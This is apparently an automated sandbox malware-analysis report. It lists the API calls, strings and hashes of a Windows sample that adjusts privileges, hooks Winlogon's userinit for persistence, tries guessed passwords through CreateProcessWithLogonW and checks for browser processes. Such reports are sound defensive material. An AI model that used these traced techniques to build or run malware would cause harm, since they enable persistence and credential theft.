                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,7604DB30), ref: 0040371E
                                                                                                                                                                                                              • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004037F3
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 00403812
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 00403845
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004038DB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040390C
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000), ref: 00403913
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040391A
                                                                                                                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 0040394B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039A7
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039AA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039B7
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039BA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039CD
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039D0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039DD
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
                                                                                                                                                                                                              • String ID: 00-->$<Actions $p=<u
                                                                                                                                                                                                              • API String ID: 3028510665-3770785300
                                                                                                                                                                                                              • Opcode ID: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                              • Instruction ID: bc67798b7604906b9ac94ea6a24e9e769d05a344691ee016a8b24aa6f3249a27
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62A1CEB25043119BC720DF64CC49F5B7BA8EFC8751F048A29FA49A7391D774EA04CB99
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,?,?,7604DB30), ref: 00403060
                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00403080
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404418,00000000,00000001,00404208,?), ref: 004030A7
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030BF
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030DA
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030F8
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00403116
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0040319C
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031A2
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031A8
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031AE
                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(004036D6), ref: 004031ED
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(00404F4C), ref: 00403396
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004033BB
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004033D9
                                                                                                                                                                                                                • Part of subcall function 00402F70: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,004031C1,00404F38), ref: 00402F78
                                                                                                                                                                                                                • Part of subcall function 00402F70: HeapAlloc.KERNEL32(00000000,?,004031C1,00404F38), ref: 00402F7F
                                                                                                                                                                                                                • Part of subcall function 00402F70: SysAllocString.OLEAUT32(004031C1), ref: 00402FA0
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00403486
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0040348C
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00403492
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Variant$Clear$Init$Alloc$HeapInitializeString$CreateDecrementInstanceInterlockedProcessSecurity
                                                                                                                                                                                                              • String ID: cmd.exe$p=<u
                                                                                                                                                                                                              • API String ID: 2839743307-310530878
                                                                                                                                                                                                              • Opcode ID: e8233dde59193e1d0be8b60998d85175095778d30159eae7e9dd8f1d15148535
                                                                                                                                                                                                              • Instruction ID: bf3241a60ff26ee6c0642b95ea0adfafd6aded52afbf6c2e6df27db904542273
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8233dde59193e1d0be8b60998d85175095778d30159eae7e9dd8f1d15148535
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8CF1EC75E102199FCB00DFA8C884A9EBBB9FF88710F15815AE914BB351D774AD41CF94
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,7604DB30), ref: 00401EC6
                                                                                                                                                                                                              • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,?,?,?,00000000,7604DB30), ref: 00401EE2
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00401F28
                                                                                                                                                                                                              • NetUserGetInfo.NETAPI32(00000000,00000000,00000001,?), ref: 00401F39
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 00401F5A
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 00401F65
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,759A5430,00000000,?), ref: 00401923
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 00401963
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                                • Part of subcall function 004018E0: CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00401FCA
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0040200A
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00402046
                                                                                                                                                                                                              • SwitchToThread.KERNEL32(?,?,00404D80,?,?,?), ref: 0040208F
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 004020B5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ByteCharFreeMultiWide$_snprintfmemset$AllocBufferValidate$CreateDisplayFileInfoInformationLogonModuleNameQuerySwitchThreadUserWith
                                                                                                                                                                                                              • String ID: %s1$%s12$%s123
                                                                                                                                                                                                              • API String ID: 1588441251-2882894844
                                                                                                                                                                                                              • Opcode ID: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                              • Instruction ID: f170fe93e02ccaf968bc2c6ae71e56240b4678089189b5983d08b015d4f9d182
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 735184B25143016BD331EB54C984FEB73E8ABD8754F404A2EF6846B1D0DB78DA44CBA6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028D9
                                                                                                                                                                                                              • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028EA
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 004028F6
                                                                                                                                                                                                              • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 00402906
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0040290C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdminAtomGlobalUser$AdjustFindPrivilege
                                                                                                                                                                                                              • String ID: Pnv$Wed Jul 6 06:49:26 20112$explorer.exe$winlogon.exe
                                                                                                                                                                                                              • API String ID: 3001685711-2958163460
                                                                                                                                                                                                              • Opcode ID: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                              • Instruction ID: 2c3c2cb6c74497f887580688acf30243e480456bbc90e7420e586ff1c8abd763
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FF012B07542196AEA1067A1AE0AB5B3A5CDB84790F404177BF04F61D0DAB99C0185FD
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00402FF7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000300,004036DE,753CE610,00402FDE), ref: 0040300F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00403012
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000300), ref: 0040301F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00403022
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,004036DE,004036DE,753CE610,00402FDE), ref: 0040302B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0040302E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,004036DE), ref: 0040303B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040303E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Free$Validate$String
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2629017576-0
                                                                                                                                                                                                              • Opcode ID: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                              • Instruction ID: 103af2a08650daedf0ea572f36775c75d91e7ca6a6ced768a9e875140008d5cd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5F05EB56012117BEA206BB66D8CF572A6CEF88B82F084025B709F2180CA74CE109678
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004015C4
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004015CF
                                                                                                                                                                                                              • Process32First.KERNEL32 ref: 004015F5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,?), ref: 00401610
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 0040161C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401638
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040164A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3955875343-0
                                                                                                                                                                                                              • Opcode ID: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                              • Instruction ID: d18670d365493a771e2935c97cc000c5a2e18494483a7794571357713e5f98ef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4111C6B25043106BD310EF55DC4899BBBD8EBE9361F04453AFA55A3290E335D9448BEA
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              • Opcode ID: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                              • Instruction ID: 5661f09ceaf7dd6985fdec3726855c2d4268d42b19af7d6053b1c23afd98fc53
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3001DB716003049BC714ABBAAC829D6B79DDF89745300813AEB19E32E2C635DC488BAD
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              • Opcode ID: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                              • Instruction ID: 972971b60caab807df67e590393efcb4d1d6a3813561f3a0b79f06a1da21d750
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69E01AB06203049BEB10AFB1AD09A5637DC9FC47413048032BB09F21A1DA38C8248B6D

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:2%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:29.1%
                                                                                                                                                                                                              Signature Coverage:3.6%
                                                                                                                                                                                                              Total number of Nodes:220
                                                                                                                                                                                                              Total number of Limit Nodes:12
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02C93300: IsUserAnAdmin.SHELL32 ref: 02C93325
                                                                                                                                                                                                                • Part of subcall function 02C93300: GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02C93344
                                                                                                                                                                                                                • Part of subcall function 02C93300: PathAddBackslashA.SHLWAPI(?), ref: 02C93351
                                                                                                                                                                                                                • Part of subcall function 02C93300: GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02C9336E
                                                                                                                                                                                                                • Part of subcall function 02C93300: _snprintf.MSVCRT ref: 02C93389
                                                                                                                                                                                                                • Part of subcall function 02C93300: RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02C933A7
                                                                                                                                                                                                                • Part of subcall function 02C93300: RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02C933FC
                                                                                                                                                                                                                • Part of subcall function 02C93300: RegCloseKey.ADVAPI32(00000000), ref: 02C9340A
                                                                                                                                                                                                                • Part of subcall function 02CB5A50: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02CB5A7F
                                                                                                                                                                                                                • Part of subcall function 02CB5A50: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02CB5AB8
                                                                                                                                                                                                                • Part of subcall function 02CB5A50: _snprintf.MSVCRT ref: 02CB5B23
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\user\AppData\Roaming\), ref: 02CA6CC0
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(C:\Users\user\AppData\Roaming\), ref: 02CA6CCB
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02CA6CDF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02CA6CFB
                                                                                                                                                                                                              • GetCommandLineA.KERNEL32 ref: 02CA6D05
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 02CA6D3D
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(02CDFB68), ref: 02CA6D65
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02CA6D86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02CA6DA4
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 02CA6DC5
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02CA6DDF
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 02CA6DE9
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CA3530,00000000,00000000,00000000), ref: 02CA6E38
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CA6E4C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA6E5D
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CA7DD0,00000000,00000000,00000000), ref: 02CA6E8C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CA6EA0
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA6EB1
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00018080,00000000,00000000,00000000), ref: 02CA6EC6
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,5DD2BD1Da), ref: 02CA6ED6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02CA6EF6
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 02CA6F17
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(5DD2BD1Da,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02CA6F34
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 02CA6F3E
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(02CDFB80), ref: 02CA6F49
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CA79D0,00000000,00000000,00000000), ref: 02CA6F5B
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CA6F6B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA6F7C
                                                                                                                                                                                                                • Part of subcall function 02C96DE0: memset.MSVCRT ref: 02C96E00
                                                                                                                                                                                                                • Part of subcall function 02C96DE0: Sleep.KERNEL32(000001F4,?,00000000,00000000), ref: 02C96E1C
                                                                                                                                                                                                                • Part of subcall function 02C96DE0: CreateThread.KERNEL32(00000000,00000000,Function_00006A90,00000000,00000000,00000000), ref: 02C96E78
                                                                                                                                                                                                                • Part of subcall function 02C96DE0: WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,74DF0F10,?,00000000,00000000), ref: 02C96EA0
                                                                                                                                                                                                                • Part of subcall function 02C96DE0: CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 02C96EB8
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CA6970,00000000,00000000,00000000), ref: 02CA6F91
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CA6FA1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA6FB2
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CA54B0,00000000,00000000,00000000), ref: 02CA6FDC
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CA6FF0
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA7001
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA7010
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA7013
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA7020
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA7023
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02CA7047
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02CA7059
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000), ref: 02CA7065
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CA7074
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\svchost.exe), ref: 02CA7090
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\iexplore.exe), ref: 02CA70B7
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\java.exe), ref: 02CA70CD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\javaw.exe), ref: 02CA70E3
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\javaws.exe), ref: 02CA70F9
